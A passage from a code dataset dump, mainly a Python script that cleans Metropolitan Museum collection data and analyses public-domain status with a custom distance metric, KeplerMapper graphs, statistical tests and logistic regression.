liste.yview)\nliste.bind('<>', immediately)\n\n# Création d'un widget Text pour visualiser le contenu d'un document\nvisuFic = Text(fenetre, width=76, height=12, background='yellow')\nvisuFic.grid(row=9, column=1, columnspan=500, sticky=N+W)\n# Création d'un widget Scrollbar associé\nscrLabel = Scrollbar(fenetre)\nscrLabel.grid(row=9, column=501, sticky=NW+SW)\nvisuFic.config(yscrollcommand = scrLabel.set)\nscrLabel.config(command = visuFic.yview) \nvisuFic.tag_configure(\"search\", background=\"green\")\n\n# Création d'un widget Button (bouton Fermer)\nbouton_quitter = Button(fenetre, text ='FERMER', command=fenetre.destroy).grid(row=11, column=0)\n\n\nfenetre.mainloop()\n\n","sub_path":"AppliGraphe.py","file_name":"AppliGraphe.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481415193","text":"import pandas as pd\r\nimport numpy as np\r\nimport kmapper\r\nimport sklearn\r\nfrom kmapper import KeplerMapper\r\nimport re\r\nimport scipy as sp\r\nfrom statsmodels.stats.proportion import proportions_ztest\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n'''Keep the desirable features and drop data points with missing value(s) '''\r\ndf = pd.read_csv('MetObjects.csv', encoding=\"ISO-8859-1\")\r\nfeature_names = ['Is Highlight', 'Is Public Domain', 'Object ID', 'Department', 'Object Name', 'Artist Begin Date','Artist End Date', 'Object Begin Date', 'Object End Date', 'Medium', 'Dimensions', 'Credit Line', 'Classification']\r\nX = df[feature_names].dropna(axis=0)\r\n''' Filter out data points whose date information doesn't make sense '''\r\nsub=X[X['Artist Begin Date'] != X['Artist End Date']]\r\nsub=sub[sub['Object Begin Date'] < sub['Object End Date']]\r\n'''Focus on artworks with 2 measurements.\r\n Extract numbers from strings. Replace Dimensions with area (product of the two extracted numbers).\r\n Record Length and Width for each artwork '''\r\nlength=[]\r\nwidth=[]\r\nfor index, row in sub.iterrows():\r\n l1 = re.findall('\\((.*?) cm', row[10])\r\n if len(l1) == 1:\r\n nums = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", l1[0])\r\n if len(nums) == 2:\r\n sub.loc[index, 'Dimensions'] = float(nums[0]) * float(nums[1])\r\n length.append(float(nums[0]))\r\n width.append(float(nums[1]))\r\n else:\r\n sub.drop(index, inplace=True)\r\n else:\r\n sub.drop(index, inplace=True)\r\nsub['Length']=length\r\nsub['Width']=width\r\n'''Extract Artist Begin Date and Artist End Date. \r\n If there is more than one number in this field, take the average. '''\r\ndelimiters = ' ', '|'\r\nregexPattern = '|'.join(map(re.escape, delimiters))\r\nfor index, row in sub.iterrows():\r\n l2 = list(filter(lambda a: a != '', re.split(regexPattern, row[5])))\r\n for x in l2:\r\n if '-' in x and x[0] != '-':\r\n l2[l2.index(x)] = int(str.split(x, '-')[0])\r\n elif '/' in x:\r\n l2[l2.index(x)] = int(str.split(x, '/')[2])\r\n else:\r\n l2[l2.index(x)] = int(x)\r\n sub.loc[index, 'Artist Begin Date'] = int(np.mean(l2))\r\n\r\nfor index, row in sub.iterrows():\r\n l3 = list(filter(lambda a: a != '', re.split(regexPattern, row[6])))\r\n for x in l3:\r\n if '-' in x and x[0] != '-':\r\n l3[l3.index(x)] = int(str.split(x, '-')[0])\r\n elif '/' in x:\r\n l3[l3.index(x)] = int(str.split(x, '/')[2])\r\n elif x == '9999':\r\n l3[l3.index(x)] = 1999\r\n else:\r\n l3[l3.index(x)] = int(x)\r\n sub.loc[index, 'Artist End Date'] = int(np.mean(l3))\r\n\r\nsub.to_csv('fullset.csv')\r\n\r\n''' To be deleted. '''\r\ndf = pd.read_csv('fullset.csv')\r\nsub = df.drop(df.columns[0], axis=1)\r\nsub = sub.drop(columns=['Is Highlight'])\r\n\r\n''' Initialize dictionaries for 'Object Name', 'Medium', 'Credit Line', 'Classification' '''\r\nmydict_name={}\r\nmydict_medium={}\r\nmydict_cl={}\r\nmydict_class={}\r\n\r\n''' Convert the type of these variables (plus 'Department') to 'category', so that we can easily assign them numerical values '''\r\nsub['Department'] = sub['Department'].astype('category')\r\nsub['Object Name'] = sub['Object Name'].astype('category')\r\nsub['Medium'] = sub['Medium'].astype('category')\r\nsub['Credit Line'] = sub['Credit Line'].astype('category')\r\nsub['Classification'] = sub['Classification'].astype('category')\r\n\r\n''' Create new columns in sub and set them to the numerical values of the corresponding columns '''\r\nsub['depart_cat'] = sub['Department'].cat.codes\r\nsub['name_cat'] = sub['Object Name'].cat.codes\r\nsub['med_cat'] = sub['Medium'].cat.codes\r\nsub['cl_cat'] = sub['Credit Line'].cat.codes\r\nsub['class_cat'] = sub['Classification'].cat.codes\r\n\r\n''' Record the correspondence between the numerical values and strings for each of the variables.\r\n We don't do so for 'Deparment' because of the way we give a subscore for it (merely comparing if two artworks have the same value). '''\r\ndelimiters = ' and ', ' or ', ' ', ',', ';', '&', '(?)', '(', ')', '/', '|', '.'\r\nregexPattern = '|'.join(map(re.escape, delimiters))\r\nfor idx, item in enumerate(sub['name_cat']):\r\n mydict_name[item]=list(filter(lambda a: a != '', re.split(regexPattern, sub['Object Name'][idx])))\r\nfor idx, item in enumerate(sub['med_cat']):\r\n mydict_medium[item]=list(filter(lambda a: a != '', re.split(regexPattern, sub['Medium'][idx])))\r\nfor idx, item in enumerate(sub['cl_cat']):\r\n delims = ', ', '; '\r\n rePattern = '|'.join(map(re.escape, delims))\r\n mydict_cl[item]=list(filter(lambda a: a != '', re.split(rePattern, sub['Credit Line'][idx])))\r\nfor idx, item in enumerate(sub['class_cat']):\r\n mydict_class[item]=list(filter(lambda a: a != '', re.split(regexPattern, sub['Classification'][idx])))\r\n '''For Classification, we need to further refine the lists of meaningful words, \r\n since the words after '-' seem similar to an artwork's Object Name and we decided to discard the part after '-'''\r\n mydict_class[item]=list(map(lambda x: x.split('-')[0], mydict_class.get(item)))\r\n'''\r\nselected=['Is Public Domain', 'Object Begin Date', 'Object End Date', 'Dimensions','Length', 'Width', 'Artist Begin Date', 'Artist End Date']\r\nsub[selected].to_csv('logistic.csv')\r\n'''\r\n''' Drop the columns with string values and keep only the numerical columns '''\r\nsub = sub.drop(columns=['Department', 'Object Name', 'Medium', 'Credit Line', 'Classification'])\r\n'''Calculate the maximum differences, which will be used in mydist to limit subscores between 0-1.'''\r\nmax_begin=max(sub['Object Begin Date'])-min(sub['Object Begin Date'])\r\nmax_end=max(sub['Object End Date'])-min(sub['Object End Date'])\r\nmax_begin_artist=max(sub['Artist Begin Date'])-min(sub['Artist Begin Date'])\r\nmax_end_artist=max(sub['Artist End Date'])-min(sub['Artist End Date'])\r\nmax_dim=max(sub['Dimensions'])-min(sub['Dimensions'])\r\nmax_len=max(sub['Length'])-min(sub['Length'])\r\nmax_wid=max(sub['Width'])-min(sub['Width'])\r\n\r\n''' Jaccard index. \r\n a: a set\r\n b: a set\r\n Output: Jaccard index for set a and set b.\r\n '''\r\ndef jaccard(a, b):\r\n c = a.intersection(b)\r\n return float(len(c)) / (len(a) + len(b) - len(c))\r\n\r\n''' Determine similarity between two artworks in terms of some categorical feature\r\n x: (list of strings) some feature of an artwork\r\n y: (list of strings) the same feature of another artwork\r\n v: (string) this feature's name\r\n Output: a score denoting similarity (1: remote 0: close)\r\n This function computes the Jaccard distance for x and y.\r\n'''\r\ndef cat_dist(x, y, v):\r\n return 1-jaccard(x, y)\r\n\r\n'''\r\nCalculate the distance between two artworks.\r\nx: a numpy.ndarray/list that contains an artwork's 13 features\r\ny: a numpy.ndarray/list that contains an artwork's 13 features\r\nOutput: distance between 0-13 (0: close 13: remote)\r\n'''\r\ndef mydist(x, y):\r\n sc1=0\r\n sc2=0\r\n sc3=0\r\n sc4=0\r\n sc5=0\r\n sc6=0\r\n sc7=0\r\n sc8=0\r\n sc9=0\r\n sc10=0\r\n sc11=0\r\n sc12=0\r\n sc13=0\r\n ''' Check if the two artworks are the same based on Object Id '''\r\n if x[0] != y[0]:\r\n sc1 = 1\r\n ''' Calculate a score for 'Artist Begin Date' '''\r\n sc2=abs(x[1]-y[1])/max_begin_artist\r\n ''' Calculate a score for 'Artist End Date' '''\r\n sc3=abs(x[2]-y[2])/max_end_artist\r\n ''' Calculate a score for 'Object Begin Date' '''\r\n sc4=abs(x[3]-y[3])/max_begin\r\n ''' Calculate a score for 'Object End Date' '''\r\n sc5=abs(x[4]-y[4])/max_end\r\n ''' Calculate a score for 'Dimensions' '''\r\n sc6 = abs(x[5]-y[5])/max_dim\r\n sc7 = abs(x[6]-y[6])/max_len\r\n sc8 = abs(x[7]-y[7])/max_wid\r\n ''' Calculate a score for 'Deparment', since there are only 19 different values for this feature,\r\n we simply check if two artworks have the same value'''\r\n if x[8] != y[8]:\r\n sc9=1\r\n ''' Calculate a score for 'Object Name' using cat_dist '''\r\n sc10=cat_dist(set(mydict_name.get(x[9])), set(mydict_name.get(y[9])), 'Object Name')\r\n ''' Calculate a score for 'Medium' using cat_dist '''\r\n sc11= cat_dist(set(mydict_medium.get(x[10])), set(mydict_medium.get(y[10])), 'Medium')\r\n ''' Calculate a score for 'Credit Line' using cat_dist '''\r\n sc12 = cat_dist(set(mydict_cl.get(x[11])), set(mydict_cl.get(x[11])), 'Credit Line')\r\n ''' Calculate a score for 'Classification' using cat_dist '''\r\n sc13 = cat_dist(set(mydict_class.get(x[12])), set(mydict_class.get(y[12])), 'Classification')\r\n '''We add up the scores to give the distance between x and y.\r\n print([sc1, sc2, sc3, sc4, sc5, sc6, sc7, sc8, sc9, sc10, sc11, sc12)'''\r\n return sc1+sc2+sc3+sc4+sc5+sc6+sc7+sc8+sc9+sc10+sc11+sc12+sc13\r\n\r\n'''lenses: eccentricity, L-infinity centrality'''\r\ndef eccentricity(x):\r\n dist_sum=0\r\n for y in sub:\r\n dist_sum=dist_sum+mydist(x,y)\r\n return dist_sum/len(sub)\r\n\r\ndef l_infinity(x):\r\n max_dist=0\r\n for y in sub:\r\n if mydist(x, y) > max_dist:\r\n max_dist=mydist(x, y)\r\n return max_dist\r\n\r\n''' Focus on a random subset of 3000. \r\n Define the color function for Mapper output graph as Is Public Domain, the variable which we are interested in predicting. \r\n Then drop it from the sample. '''\r\nsubset=sub.sample(3000, random_state=999)\r\nmy_colors=np.array(subset['Is Public Domain'])\r\nsubset=np.array(subset.drop(columns=['Is Public Domain']))\r\n\r\n'''Initialize Mapper'''\r\nmapper: KeplerMapper = kmapper.KeplerMapper(verbose=2)\r\n'''Initialize MDS, our lens function for Mapper.\r\n Since we are using mydist, a custom metric, we set dissmilarity. '''\r\nmds=sklearn.manifold.MDS(dissimilarity='precomputed', random_state=88)\r\n'''Using mydist, compute a distance matrix for our sample and save it.'''\r\ndist_matrix = sp.spatial.distance.squareform(sp.spatial.distance.pdist(subset, metric=mydist))\r\nnp.savetxt('3000pcs.csv', dist_matrix, delimiter=',')\r\n'''Apply MDS to our sample to get our lens.'''\r\nlens=mds.fit_transform(dist_matrix)\r\n'''Using DBSCAN and our metric, generate simplicial complex.'''\r\nsimplicial_complex= mapper.map(lens,\r\n subset,\r\n nr_cubes=10,\r\n overlap_perc=0.4,\r\n clusterer=sklearn.cluster.DBSCAN(eps=5, metric=mydist, algorithm='brute', min_samples=10))\r\n''' Output the simplicial complex, colored by 'Is Public Domain', as a webpage. '''\r\nhtml = mapper.visualize(simplicial_complex, path_html=\"art.html\", color_function=my_colors)\r\n\r\n''' Examples:\r\n1. d(x, y) >= 0\r\nfor x in subset:\r\n for y in subset:\r\n if mydist(x, y) < 0:\r\n print(x, y)\r\n \r\n2. d(x, x) = 0\r\nfor x in subset:\r\n if mydist(x, x) != 0:\r\n print(x)\r\n\r\n3. d(x, y) = 0 => x = y\r\nThis is clear since no artworks share the same Object ID, and the way we calculate distance says that if x, y do not have the same Object ID, we assign a subscore of 1.\r\n\r\n4. d(x, y) = d(y, x)\r\nfor x in subset:\r\n for y in subset:\r\n if mydist(x, y) != mydist(y, x):\r\n print(x, y)\r\n\r\n5. d(x, y) + d(y, z) >= d(x, z)\r\ndef triangle_inequality(x, y, z):\r\n if mydist(x, y) + mydist(y, z) >= mydist(x, z):\r\n return True\r\n else:\r\n print(x, y, z)\r\n return False\r\nfor x in subset:\r\n for y in subset:\r\n for z in subset:\r\n triangle_inequality(x, y, z)\r\n \r\nThe following codes are for determining the subset of the dataset to work on.\r\ndf2=df[feature_names].dropna(axis=0)\r\nnum=num2=0\r\nfor str in df2['Dimensions']:\r\n if len(re.findall('\\((.*?) cm', str)) == 1:\r\n num = num + 1\r\n else:\r\n num2 = num2 + 1\r\n\r\nnum=num2=num3=num4=0\r\nfor str in df2['Dimensions']:\r\n l = re.findall('\\((.*?) cm', str)\r\n if len(l) == 1:\r\n nums = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", l[0])\r\n if len(nums) == 1:\r\n num = num + 1\r\n elif len(nums) == 2:\r\n num2 = num2 + 1\r\n elif len(nums) == 3:\r\n num3 = num3 + 1\r\n else:\r\n num4 = num4 + 1\r\n'''\r\nred_nodes=[]\r\nred_nodes.append('cube20_cluster0')\r\nred_nodes.append('cube31_cluster0')\r\nred_nodes.append('cube21_cluster0')\r\nred_nodes.append('cube20_cluster1')\r\nred_nodes.append('cube30_cluster0')\r\nred_nodes.append('cube31_cluster1')\r\nred_nodes.append('cube41_cluster0')\r\nred_nodes.append('cube40_cluster0')\r\nred_nodes.append('cube51_cluster0')\r\nred_nodes.append('cube50_cluster0')\r\nred_nodes.append('cube61_cluster0')\r\nblue_nodes=[]\r\nblue_nodes.append('cube67_cluster0')\r\nblue_nodes.append('cube57_cluster0')\r\nblue_nodes.append('cube58_cluster0')\r\nblue_nodes.append('cube48_cluster0')\r\nblue_nodes.append('cube38_cluster0')\r\nblue_nodes.append('cube47_cluster0')\r\nblue_nodes.append('cube37_cluster0')\r\nblue_nodes.append('cube27_cluster0')\r\nblue_nodes.append('cube36_cluster0')\r\nblue_nodes.append('cube26_cluster0')\r\nblue_nodes.append('cube25_cluster0')\r\nblue_nodes.append('cube16_cluster0')\r\nblue_nodes.append('cube15_cluster0')\r\nred_index=[]\r\nfor x in red_nodes:\r\n red_index.extend(simplicial_complex.get('nodes').get(x))\r\nred_index=list(set(red_index))\r\nred_pd=[]\r\nfor x in red_index:\r\n red_pd.append(my_colors[x])\r\nlen(red_pd)\r\n#276\r\nsum(red_pd)\r\n#225\r\nblue_index = []\r\nfor x in blue_nodes:\r\n blue_index.extend(simplicial_complex.get('nodes').get(x))\r\nblue_index = list(set(blue_index))\r\nblue_pd = []\r\nfor x in blue_index:\r\n blue_pd.append(my_colors[x])\r\nlen(blue_pd)\r\n#1049\r\nsum(blue_pd)\r\n#275\r\ncount = np.array([225, 275])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#0.000\r\nabd_red=[]\r\nfor x in red_index:\r\n abd_red.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist Begin Date']))\r\nabd_blue=[]\r\nfor x in blue_index:\r\n abd_blue.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist Begin Date']))\r\nsp.stats.ranksums(abd_red, abd_blue)\r\n#RanksumsResult(statistic=-11.606060878281362, pvalue=3.8389682437780603e-31) Significant\r\naed_red=[]\r\nfor x in red_index:\r\n aed_red.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist End Date']))\r\naed_blue=[]\r\nfor x in blue_index:\r\n aed_blue.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist End Date']))\r\nsp.stats.ranksums(aed_red, aed_blue)\r\n#RanksumsResult(statistic=-10.265227229606868, pvalue=1.0108271873662676e-24) Significant\r\nnp.median(aed_red)\r\n#1807.5\r\nnp.median(aed_blue)\r\n#1920.0\r\nnp.median(abd_red)\r\n#1744.0\r\nnp.median(abd_blue)\r\n#1850.0\r\nobd_red=[]\r\nfor x in red_index:\r\n obd_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object Begin Date']))\r\nobd_blue = []\r\nfor x in blue_index:\r\n obd_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object Begin Date']))\r\nsp.stats.ranksums(obd_red, obd_blue)\r\n#RanksumsResult(statistic=-11.489551203376761, pvalue=1.4888338343397409e-30) Significant\r\noed_red=[]\r\nfor x in red_index:\r\n oed_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object End Date']))\r\noed_blue = []\r\nfor x in blue_index:\r\n oed_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object End Date']))\r\nsp.stats.ranksums(oed_red, oed_blue)\r\n#RanksumsResult(statistic=-10.972948365635876, pvalue=5.1563080839906435e-28) Significant\r\nnp.median(obd_red)\r\n#1760.0\r\nnp.median(obd_blue)\r\n#1880.0\r\nnp.median(oed_red)\r\n#1792.5\r\nnp.median(oed_blue)\r\n#1890.0\r\ndim_red=[]\r\nfor x in red_index:\r\n dim_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Dimensions']))\r\ndim_blue = []\r\nfor x in blue_index:\r\n dim_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Dimensions']))\r\nsp.stats.ranksums(dim_red, dim_blue)\r\n#RanksumsResult(statistic=16.159308476905167, pvalue=9.76509242707288e-59) Significant\r\nlen_red=[]\r\nfor x in red_index:\r\n len_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Length']))\r\nlen_blue = []\r\nfor x in blue_index:\r\n len_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Length']))\r\nsp.stats.ranksums(len_red, len_blue)\r\n#RanksumsResult(statistic=14.8747848911398, pvalue=4.805270833716341e-50)\r\nwid_red=[]\r\nfor x in red_index:\r\n wid_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Width']))\r\nwid_blue = []\r\nfor x in blue_index:\r\n wid_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Width']))\r\nsp.stats.ranksums(wid_red, wid_blue)\r\n#RanksumsResult(statistic=16.558429252469864, pvalue=1.3918027191571795e-61)\r\nnp.median(dim_red)\r\n#1893.7150000000001\r\nnp.median(dim_blue)\r\n#109.06\r\nnp.median(len_red)\r\n#41.599999999999994\r\nnp.median(len_blue)\r\n#11.2\r\nnp.median(wid_red)\r\n#42.7\r\nnp.median(wid_blue)\r\n#8.9\r\npd.DataFrame(subset)[8].unique()\r\n#array([ 4., 13., 3., 10., 0., 6., 5., 12., 2., 1., 14., 8., 9.])\r\nred_0=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 0:\r\n red_0.append(1)\r\n else:\r\n red_0.append(0)\r\nblue_0=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 0:\r\n blue_0.append(1)\r\n else:\r\n blue_0.append(0)\r\ncount = np.array([59, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#5.6476517832074895e-53\r\nred_1=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 1:\r\n red_1.append(1)\r\n else:\r\n red_1.append(0)\r\nblue_1=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 1:\r\n blue_1.append(1)\r\n else:\r\n blue_1.append(0)\r\ncount = np.array([2, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#0.006\r\nred_2=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 2:\r\n red_2.append(1)\r\n else:\r\n red_2.append(0)\r\nblue_2=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 2:\r\n blue_2.append(1)\r\n else:\r\n blue_2.append(0)\r\ncount = np.array([0, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#Invalid\r\nred_3=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 3:\r\n red_3.append(1)\r\n else:\r\n red_3.append(0)\r\nblue_3=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 3:\r\n blue_3.append(1)\r\n else:\r\n blue_3.append(0)\r\ncount = np.array([47, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#3.5429344587157824e-42\r\nred_4=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 4:\r\n red_4.append(1)\r\n else:\r\n red_4.append(0)\r\nblue_4=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 4:\r\n blue_4.append(1)\r\n else:\r\n blue_4.append(0)\r\ncount = np.array([0, 1048])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#8.578128248147642e-289\r\nred_5=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 5:\r\n red_5.append(1)\r\n else:\r\n red_5.append(0)\r\nblue_5=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 5:\r\n blue_5.append(1)\r\n else:\r\n blue_5.append(0)\r\ncount = np.array([82, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#3.157917716649403e-74\r\nred_6=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 6:\r\n red_6.append(1)\r\n else:\r\n red_6.append(0)\r\nblue_6=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 6:\r\n blue_6.append(1)\r\n else:\r\n blue_6.append(0)\r\ncount = np.array([69, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#4.018824778080052e-62\r\nred_8=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 8:\r\n red_8.append(1)\r\n else:\r\n red_8.append(0)\r\nblue_8=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 8:\r\n blue_8.append(1)\r\n else:\r\n blue_8.append(0)\r\n#invalid\r\nred_9=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 9:\r\n red_9.append(1)\r\n else:\r\n red_9.append(0)\r\nblue_9=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 9:\r\n blue_9.append(1)\r\n else:\r\n blue_9.append(0)\r\n#invalid\r\nred_10=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 10:\r\n red_10.append(1)\r\n else:\r\n red_10.append(0)\r\nblue_10=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 10:\r\n blue_10.append(1)\r\n else:\r\n blue_10.append(0)\r\ncount = np.array([7, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#2.3198662946472394e-07\r\nred_12=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 12:\r\n red_12.append(1)\r\n else:\r\n red_12.append(0)\r\nblue_12=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 12:\r\n blue_12.append(1)\r\n else:\r\n blue_12.append(0)\r\ncount = np.array([7, 1])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#3.1990577036414517e-06\r\nred_13=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 13:\r\n red_13.append(1)\r\n else:\r\n red_13.append(0)\r\nblue_13=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 13:\r\n blue_13.append(1)\r\n else:\r\n blue_13.append(0)\r\ncount = np.array([3, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#0.0007234362029969521\r\nred_14=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 14:\r\n red_14.append(1)\r\n else:\r\n red_14.append(0)\r\nblue_14=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 14:\r\n blue_14.append(1)\r\n else:\r\n blue_14.append(0)\r\n#invalid\r\n#reduced=['depart_4']\r\n'''Compare full model with reduced model'''\r\nlogreg = LogisticRegression()\r\nX_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(pd.DataFrame(subset)[13], my_colors, test_size=0.2)\r\nmodel = logreg.fit(np.reshape(np.array(X_train),(-1, 1)), y_train)\r\npredictions = logreg.predict(np.reshape(np.array(X_test), (-1,1)))\r\nmodel.score(np.reshape(np.array(X_test), (-1, 1)), y_test)\r\n#0.5216666666666666\r\nX=subset[['Artist Begin Date', 'Artist End Date', 'Object Begin Date', 'Object End Date', 'Dimensions', 'Length', 'Width', 'American Decorative Arts', 'Arms and Armor', 'Arts of Africa, Oceania, and the Americas', 'Asian Art', 'Drawings and Prints', 'European Paintings', 'European Sculpture and Decorative Arts', 'Islamic Art', 'Medieval Art', 'Modern and Contemporary Art', 'Photographs', 'Robert Lehman Collection']]\r\nmodel.score(X_test, y_test)\r\n#0.7383333333333333\r\n\r\n#For sub, reduced model accuracy score is 0.5530340897730681, and full model accauray score is 0.7257822653204039\r\n\r\n''' Artist Begin Date & Artist End Date v.s. N.A. '''\r\n'''df = pd.read_csv('MetObjects.csv', encoding=\"ISO-8859-1\")\r\nfeature_names = ['Is Public Domain', 'Object ID', 'Department', 'Object Name', 'Artist Begin Date', 'Artist End Date', 'Object Begin Date', 'Object End Date', 'Medium', 'Dimensions', 'Credit Line', 'Classification']\r\nX = df[feature_names]\r\nX=X[X['Object Begin Date'] < X['Object End Date']]\r\nX_na=X[pd.isna(X['Artist Begin Date'])]\r\nX_na=X_na[pd.isna(X_na['Artist End Date'])]\r\nX_na.drop(columns=['Artist Begin Date', 'Artist End Date'], inplace=True)\r\nX_na=X_na.dropna(axis=0)\r\nlength=[]\r\nwidth=[]\r\nfor index, row in X_na.iterrows():\r\n l1 = re.findall('\\((.*?) cm', row[7])\r\n if len(l1) == 1:\r\n nums = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", l1[0])\r\n if len(nums) == 2:\r\n X_na.loc[index, 'Dimensions'] = float(nums[0]) * float(nums[1])\r\n length.append(float(nums[0]))\r\n width.append(float(nums[1]))\r\n else:\r\n X_na.drop(index, inplace=True)\r\n else:\r\n X_na.drop(index, inplace=True)\r\nX_na['Length']=length\r\nX_na['Width']=width\r\nmax_begin2=max(X_na['Object Begin Date'])-min(X_na['Object Begin Date'])\r\nmax_end2=max(X_na['Object End Date'])-min(X_na['Object End Date'])\r\nmax_dim2=max(X_na['Dimensions'])-min(X_na['Dimensions'])\r\nmax_len2=max(X_na['Length'])-min(X_na['Length'])\r\nmax_wid2=max(X_na['Width'])-min(X_na['Width'])\r\nmydict_name2={}\r\nmydict_medium2={}\r\nmydict_cl2={}\r\nmydict_class2={}\r\nX_na['Department'] = X_na['Department'].astype('category')\r\nX_na['Object Name'] = X_na['Object Name'].astype('category')\r\nX_na['Medium'] = X_na['Medium'].astype('category')\r\nX_na['Credit Line'] = X_na['Credit Line'].astype('category')\r\nX_na['Classification'] = X_na['Classification'].astype('category')\r\nX_na['depart_cat'] = X_na['Department'].cat.codes\r\nX_na['name_cat'] = X_na['Object Name'].cat.codes\r\nX_na['med_cat'] = X_na['Medium'].cat.codes\r\nX_na['cl_cat'] = X_na['Credit Line'].cat.codes\r\nX_na['class_cat'] = X_na['Classification'].cat.codes\r\ndelimiters = ' and ', ' or ', ' ', ',', ';', '&', '(?)', '(', ')', '/', '|', '.'\r\nregexPattern = '|'.join(map(re.escape, delimiters))\r\nfor idx, item in enumerate(X_na['name_cat']):\r\n mydict_name2[item]=list(filter(lambda a: a != '', re.split(regexPattern, X_na['Object Name'][idx])))\r\nfor idx, item in enumerate(X_na['med_cat']):\r\n mydict_medium2[item]=list(filter(lambda a: a != '', re.split(regexPattern, X_na['Medium'][idx])))\r\nfor idx, item in enumerate(X_na['cl_cat']):\r\n delims = ', ', '; '\r\n rePattern = '|'.join(map(re.escape, delims))\r\n mydict_cl2[item]=list(filter(lambda a: a != '', re.split(rePattern, X_na['Credit Line'][idx])))\r\nfor idx, item in enumerate(X_na['class_cat']):\r\n mydict_class2[item]=list(filter(lambda a: a != '', re.split(regexPattern, X_na['Classification'][idx])))\r\n mydict_class2[item]=list(map(lambda x: x.split('-')[0], mydict_class2.get(item)))\r\nX_na.drop(columns=['Department', 'Object Name', 'Medium', 'Credit Line', 'Classification'], 